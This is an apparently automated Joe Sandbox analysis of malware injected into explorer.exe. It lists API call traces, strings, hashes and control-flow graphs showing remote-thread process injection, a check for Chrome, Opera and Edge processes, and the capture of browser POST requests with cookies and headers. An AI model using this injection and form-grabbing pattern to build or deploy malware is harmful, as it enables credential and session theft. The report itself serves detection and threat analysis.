                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$MappingOpenView
                                    • String ID:
                                    • API String ID: 3439327939-0
                                    • Opcode ID: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                    • Instruction ID: 31edbaac02ff07a1b824ab005dc06848c6bb7be7fdd6de8e3064e283bb2ae97a
                                    • Opcode Fuzzy Hash: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                    • Instruction Fuzzy Hash: 5ED017327052327BE3706ABB6C0CF836EDDEF86AE1B014025B649D2150D6608821C7F0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 312 81000-81010 GetProcessHeap RtlAllocateHeap
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID:
                                    • API String ID: 1357844191-0
                                    • Opcode ID: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                    • Instruction ID: 4deb57588eb96029a35becf2c55eca230ebc00b67c115c5e18b133d903a3b778
                                    • Opcode Fuzzy Hash: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                    • Instruction Fuzzy Hash: 0EA002B59501115BFE4457E4BD0DB173518B744745F248544738685050A97854148F21

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 313 81011-8101b call 81274 316 8102d-8102e 313->316 317 8101d-81027 GetProcessHeap HeapFree 313->317 317->316
                                    APIs
                                      • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                    • HeapFree.KERNEL32(00000000), ref: 00081027
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 2580854192-0
                                    • Opcode ID: 5f42877d8e3920b7bfd873553e3772e2c12dbafe832c0d2951b5b4260f378939
                                    • Instruction ID: 73dac1b4d99c4d0101d6bf60127167cb710a494476b2b1900cddaa98e4698dba
                                    • Opcode Fuzzy Hash: 5f42877d8e3920b7bfd873553e3772e2c12dbafe832c0d2951b5b4260f378939
                                    • Instruction Fuzzy Hash: CCC08C3180426096DA6037E03C0CBC72A0CBF09251F040641B68492082CAB888168BA0

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
                                    • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
                                    • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000820E5
                                    • RtlMoveMemory.NTDLL(00000000,000850A0,00000016), ref: 0008210C
                                    • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00082134
                                    • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00082144
                                    • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0008215E
                                    • GetLastError.KERNEL32 ref: 00082166
                                    • CloseHandle.KERNEL32(00000000), ref: 00082174
                                    • Sleep.KERNEL32(000003E8), ref: 0008217B
                                    • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00082191
                                    • GetProcAddress.KERNEL32(00000000), ref: 00082198
                                    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
                                    • CloseHandle.KERNEL32(00000000), ref: 000821F2
                                    • Sleep.KERNEL32(000001F4), ref: 000821F9
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0008220D
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00082224
                                    • CloseHandle.KERNEL32(00000000), ref: 00082231
                                    • CloseHandle.KERNEL32(?), ref: 00082237
                                    • CloseHandle.KERNEL32(?), ref: 0008223D
                                    • CloseHandle.KERNEL32(00000000), ref: 00082240
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                    • String ID: atan$ntdll$opera_shared_counter
                                    • API String ID: 1066286714-2737717697
                                    • Opcode ID: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                    • Instruction ID: b8529cd7b6f7b3f81938f29da9ae38e819e5d60d405e704a022585a417c3316f
                                    • Opcode Fuzzy Hash: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                    • Instruction Fuzzy Hash: 56616D71508315AFE710AF658C88E6B7BECFB88754F000629BA89D3291D778DD058F66
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                    • lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                    • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                    • wsprintfA.USER32 ref: 00081205
                                    • CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                    • String ID: %02X
                                    • API String ID: 3341110664-436463671
                                    • Opcode ID: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                    • Instruction ID: 298286c9a9371f5bd7e7a063f8446572b34c6f4efce2401be2fb8dd3adceacc5
                                    • Opcode Fuzzy Hash: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                    • Instruction Fuzzy Hash: 62113D71900109BFEB119F95EC88EEFBBBCFB44701F104065F645E2150DB754E559B60
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 000816D9
                                    • GetCurrentThreadId.KERNEL32 ref: 000816E1
                                    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                    • Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                    • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
                                    • SuspendThread.KERNEL32(00000000), ref: 0008172E
                                    • CloseHandle.KERNEL32(00000000), ref: 0008173D
                                    • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008174D
                                    • CloseHandle.KERNEL32(00000000), ref: 00081758
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                    • String ID:
                                    • API String ID: 1467098526-0
                                    • Opcode ID: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                    • Instruction ID: 9f8a97b458fd6a1e1d725efe8f807f36da717ca79b52438bb26f371cecc15507
                                    • Opcode Fuzzy Hash: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                    • Instruction Fuzzy Hash: 53113C72408212EBE711AF60AC48AAFBFF8FF85711F05041DF6C592150D738894A9FA7
                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                    • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                    • StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                    • String ID: NetworkService
                                    • API String ID: 1656241333-2019834739
                                    • Opcode ID: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                    • Instruction ID: 2a2cb19856545ee97dced0d83344d7303902199a923c80ef4bb46b56f5b20446
                                    • Opcode Fuzzy Hash: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                    • Instruction Fuzzy Hash: EC01D471300346BFE7247B219C49FAB3A9DFFD8392F014029F68AD6142DAB59C808B20
                                    APIs
                                    • RtlMoveMemory.NTDLL(?,?,?), ref: 00081E83
                                    • LoadLibraryA.KERNEL32(?), ref: 00081EAB
                                    • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00081ED8
                                    • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081F29
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                    • String ID:
                                    • API String ID: 3827878703-0
                                    • Opcode ID: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                    • Instruction ID: 568ebf0d0beaab3ca419b44d6bddffa2e7cdb8569d387974d06ed25d6f468c67
                                    • Opcode Fuzzy Hash: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                    • Instruction Fuzzy Hash: A4317A72700216ABCB689F29CC84BA6B7ECFF15354B15456CE986CB201D735E846CBA4
                                    APIs
                                    • StrStrIA.SHLWAPI(chrome.exe|opera.exe|msedge.exe,?), ref: 00082EB4
                                      • Part of subcall function 00082E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                      • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                      • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                      • Part of subcall function 00082E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                    Strings
                                    • chrome.exe|opera.exe|msedge.exe, xrefs: 00082EAB
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Process$InformationQuery$Open
                                    • String ID: chrome.exe|opera.exe|msedge.exe
                                    • API String ID: 4117927671-3743313796
                                    • Opcode ID: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                    • Instruction ID: 74462bb72cca3f48bcbab1f2b981006a3a1547241742571b3dc85306c1ef6728
                                    • Opcode Fuzzy Hash: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                    • Instruction Fuzzy Hash: C6D0A932300222072B2C367A6C0A86FA48DEBC2A62302013EF982C7240EA908C0343A4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 355 82974-829a2 356 829a8-829aa 355->356 357 82b65-82b6d 355->357 356->357 358 829b0-829b9 call 81765 356->358 358->357 361 829bf-829c1 358->361 361->357 362 829c7-829c9 361->362 362->357 363 829cf-829df call 81141 362->363 363->357 366 829e5-82a0d call 81000 * 3 363->366 373 82a11 call 8104c 366->373 374 82a16-82a30 call 8285f 373->374 377 82a4c-82a64 call 8285f 374->377 378 82a32-82a42 call 8285f 374->378 384 82a6e-82a85 call 8285f 377->384 385 82a66-82a6c lstrcat 377->385 378->377 383 82a44-82a4a lstrcat 378->383 383->377 388 82a8f-82ab2 RtlZeroMemory call 8285f 384->388 389 82a87-82a8d lstrcat 384->389 385->384 392 82ac3 388->392 393 82ab4-82ac1 StrToIntA 388->393 389->388 394 82ac7-82ac9 392->394 393->394 395 82acb-82ace 394->395 396 82b42-82b64 call 8105d call 81011 * 3 394->396 395->396 398 82ad0-82ad7 395->398 396->357 398->396 400 82ad9-82adf 398->400 402 82ae5 call 8104c 400->402 404 82aea-82b29 wnsprintfA call 828ad 402->404 410 82b2b-82b2d lstrcat 404->410 411 82b2f-82b3e lstrcat * 2 404->411 410->411 411->396
                                    APIs
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                      • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                      • Part of subcall function 0008285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 000828A2
                                    • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00082A4A
                                    • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00082A6C
                                    • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00082A8D
                                    • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082A96
                                    • StrToIntA.SHLWAPI(00000000), ref: 00082AB9
                                    • wnsprintfA.SHLWAPI ref: 00082B0D
                                    • lstrcat.KERNEL32(00000000,?), ref: 00082B2D
                                    • lstrcat.KERNEL32(00000000,{:!:}), ref: 00082B35
                                    • lstrcat.KERNEL32(00000000,?), ref: 00082B3C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                    • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                    • API String ID: 2605944266-950501416
                                    • Opcode ID: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                    • Instruction ID: d8dd03a251d738af89b9767004e5c399ca865ed0c4bb03e024ab117a7b61717e
                                    • Opcode Fuzzy Hash: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                    • Instruction Fuzzy Hash: BF516D706043419BDB19BF24C984AAEBBDABF98304F04081DF8C597293DB78DC468B66
                                    APIs
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                    • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                    • StrToIntA.SHLWAPI(?), ref: 00083024
                                    • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                    • wsprintfA.USER32 ref: 000830B9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                    • lstrcat.KERNEL32(?,{:!:}), ref: 000830F8
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,00086038), ref: 00083109
                                    • RtlMoveMemory.NTDLL(00000000), ref: 00083112
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                    • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                    • API String ID: 2886538537-1627781280
                                    • Opcode ID: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                    • Instruction ID: 0ab628cf7cdd2d7bd700d5d11cd162a6a2ce618acf256a36fb072680de120010
                                    • Opcode Fuzzy Hash: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                    • Instruction Fuzzy Hash: 243193313002466BD704BB248C59BAF36AEBFC4B41F00443CFAC297283DA7999468BA1
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 0008322D
                                    • wsprintfA.USER32 ref: 0008329E
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000832AF
                                    • lstrcat.KERNEL32(00000000,{:!:}), ref: 000832BE
                                    • lstrlen.KERNEL32(00000000), ref: 000832C1
                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000832D2
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                    • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                    • API String ID: 3430864794-1604029033
                                    • Opcode ID: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                    • Instruction ID: 195aec8412d902ec1d20601123c3bc2efe934f71044cf50dfad01e2279433394
                                    • Opcode Fuzzy Hash: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                    • Instruction Fuzzy Hash: 23415E71104345AFD311EF10DC48EABBBEDFF88745F00092EF58296252DB799A49CBA6
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083455
                                    • lstrcat.KERNEL32 ref: 000834AB
                                      • Part of subcall function 00082FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                      • Part of subcall function 00082FAA: StrToIntA.SHLWAPI(?), ref: 00083024
                                      • Part of subcall function 00082FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                      • Part of subcall function 00082FAA: wsprintfA.USER32 ref: 000830B9
                                      • Part of subcall function 00082FAA: lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                      • Part of subcall function 00082F1F: CreateThread.KERNEL32(00000000,00000000,00082ED2,?,00000000,00000000), ref: 00082F2F
                                      • Part of subcall function 00082F1F: CloseHandle.KERNEL32(00000000), ref: 00082F36
                                      • Part of subcall function 0008105D: VirtualFree.KERNEL32(?,00000000,00008000,00082B4B), ref: 00081065
                                    • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00083504
                                    • StrToIntA.SHLWAPI(?), ref: 0008352B
                                    • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0008358D
                                    • RtlLeaveCriticalSection.NTDLL(00086038), ref: 000835C1
                                      • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                    • String ID: $Content-Length:$POST
                                    • API String ID: 2960674810-114478848
                                    • Opcode ID: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                    • Instruction ID: 94e072d73854c321fe1628760210cd651d563a19d9d3a009ac864edf1f9d31a3
                                    • Opcode Fuzzy Hash: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                    • Instruction Fuzzy Hash: 7931C4306043418BEB11BF64D9686AB7BA9BF84701F01042DEAC29B353CB7E990DCF59
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                      • Part of subcall function 0008106C: lstrlen.KERNEL32(?,?,00000000,00000000,0008189F,75712B62,?,00000000), ref: 00081074
                                      • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00081086
                                      • Part of subcall function 000817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 000817EE
                                    • RtlZeroMemory.NTDLL(?,0000003C), ref: 000818FB
                                    • wsprintfW.USER32 ref: 000819F2
                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081AD0
                                    Strings
                                    • Accept: */*Referer: %S, xrefs: 000819E8
                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 00081A34
                                    • POST, xrefs: 000819A0
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                    • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                    • API String ID: 3833683434-704803497
                                    • Opcode ID: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                    • Instruction ID: 3dcbdeb0ded9a8cf15a9f97d83848ce06ad77dce3e8d70dcbeb4fea29dcfcf14
                                    • Opcode Fuzzy Hash: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                    • Instruction Fuzzy Hash: 648145B1608301AFD714AF68DC88AABBAEDFF88744F00092DF585D3251EB75D946CB52
                                    APIs
                                      • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                    • lstrcat.KERNEL32(?,00000000), ref: 000825BB
                                    • lstrcat.KERNEL32(?,000842A8), ref: 000825C7
                                    • lstrcat.KERNEL32(?,?), ref: 000825D6
                                    • lstrcat.KERNEL32(?,000842AC), ref: 000825E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrcat$AllocVirtual
                                    • String ID: :authority$?$dyn_header
                                    • API String ID: 3028025275-1785586894
                                    • Opcode ID: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                    • Instruction ID: a3df1192de0655e9dc7a3e2b16972a5207b0361e37cf12fd9c8c807a48e009f7
                                    • Opcode Fuzzy Hash: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                    • Instruction Fuzzy Hash: CC61E3725087128FC710FE24D5906AEB7E6BB94350F44092DF8C157283EA399E0EDB62
                                    APIs
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                      • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                    • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0008291B
                                    • lstrcat.KERNEL32(?,000842BC), ref: 0008292A
                                    • lstrlen.KERNEL32(?,75712B62,00000001,?,?,00000000,?,?,00082B26,?,?,?,?,00000001), ref: 0008295C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$MemoryMovelstrcat
                                    • String ID: cookie
                                    • API String ID: 2957667536-1295510418
                                    • Opcode ID: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                    • Instruction ID: f53226ebe774a6e1b9e5076833723ffb49a62c81fd320fd2bb11fdc6a523b402
                                    • Opcode Fuzzy Hash: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                    • Instruction Fuzzy Hash: 0411B7323083029BD711BE94DC89B9BB7D9FF90714F14052DFDC197242EAB5E80A4791
                                    APIs
                                    • OpenProcess.KERNEL32(00000400,00000000), ref: 000812BC
                                    • IsWow64Process.KERNEL32(000000FF,?), ref: 000812CE
                                    • IsWow64Process.KERNEL32(00000000,?), ref: 000812E1
                                    • CloseHandle.KERNEL32(00000000), ref: 000812F7
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Process$Wow64$CloseHandleOpen
                                    • String ID:
                                    • API String ID: 331459951-0
                                    • Opcode ID: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                    • Instruction ID: 4c13458c48fa9fbbcfea10e07012997bffba25426b6b543f99b22ac2bec5ef8b
                                    • Opcode Fuzzy Hash: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                    • Instruction Fuzzy Hash: 1DF09071806219FFAB20DFA0AD449EFBBBCFF01251F20426AE941D2140DB354E029BA1
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083332
                                    • RtlLeaveCriticalSection.NTDLL(00086038), ref: 00083358
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: POST
                                    • API String ID: 3168844106-1814004025
                                    • Opcode ID: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                    • Instruction ID: 55dcfb8202f6423abaeb440588ec9f58bbec6868fc7e7fe62f416efc705c6caf
                                    • Opcode Fuzzy Hash: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                    • Instruction Fuzzy Hash: 63018131500114EBDB213F20EC4889F7FA9FFC5BA17184020FA8A96222DF36DE51DBA1

                                    Execution Graph

                                    Execution Coverage:7.7%
